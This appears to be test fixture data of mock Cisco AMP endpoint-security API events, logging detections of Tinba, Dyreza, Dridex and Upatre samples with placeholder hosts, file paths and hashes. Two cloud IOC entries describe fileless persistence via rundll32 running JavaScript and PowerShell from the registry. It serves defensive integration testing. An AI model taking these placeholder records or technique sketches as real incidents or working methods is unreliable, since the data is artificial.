Documents\\Downloads\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415396303000800,"timestamp":1610705341,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Variant:Tinba.15hl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705341,"start_date":"2021-01-15T10:09:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"bin.exe","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\Application Data\\default\\bin.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49","sha1":"194ada957926b985653f0400ede75175df6b48be","md5":"c141be7ef8a49c2e8bda5e4a856386ac"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":503000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086401","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Tinba.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Tinba.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256842453221000,"timestamp":1610705336,"timestamp_nanoseconds":643000000,"date":"2021-01-15T10:08:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256842453221429","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256790913614000,"timestamp":1610705324,"timestamp_nanoseconds":631000000,"date":"2021-01-15T10:08:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256790913613876","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256739374006000,"timestamp":1610705312,"timestamp_nanoseconds":619000000,"date":"2021-01-15T10:08:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256739374006323","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256687834399000,"timestamp":1610705300,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:08:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256687834398770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256636294791000,"timestamp":1610705288,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:08:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256636294791217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":559000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739226271700,"timestamp":1610705284,"timestamp_nanoseconds":226259000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Poweliks is a fileless click-fraud malware variant which resides within the registry. It maintains persistence by creating a registry key that makes use of rundll32 to execute javascript code to read Powershell from the Windows registry, which subsequently executes portable executable code in memory.","short_description":"W32.PoweliksPersistence.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739190653000,"timestamp":1610705284,"timestamp_nanoseconds":190644000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The rundll32 application is designed to run code present in DLLs. There is however a case where it can also be used in the same way as MSHTA to execute JavaScript code on the command-line.","short_description":"W32.rundll32RunHTMLApplication.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666334151016000,"timestamp":1610705283,"timestamp_nanoseconds":977000000,"date":"2021-01-15T10:08:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.B1380FD95B-100.SBX.TG","detection_id":"6533666334151016449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":3180,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256584755184000,"timestamp":1610705276,"timestamp_nanoseconds":957000000,"date":"2021-01-15T10:07:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256584755183664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709202491408000,"timestamp":1610705270,"timestamp_nanoseconds":802000000,"date":"2021-01-15T10:07:50+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209764771561000,"timestamp":1610705269,"timestamp_nanoseconds":265000000,"date":"2021-01-15T10:07:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209764771561497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256537510543000,"timestamp":1610705265,"timestamp_nanoseconds":319000000,"date":"2021-01-15T10:07:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256537510543407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":187000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841155","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55722,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841158","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55725,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841157","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55724,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841156","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55723,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 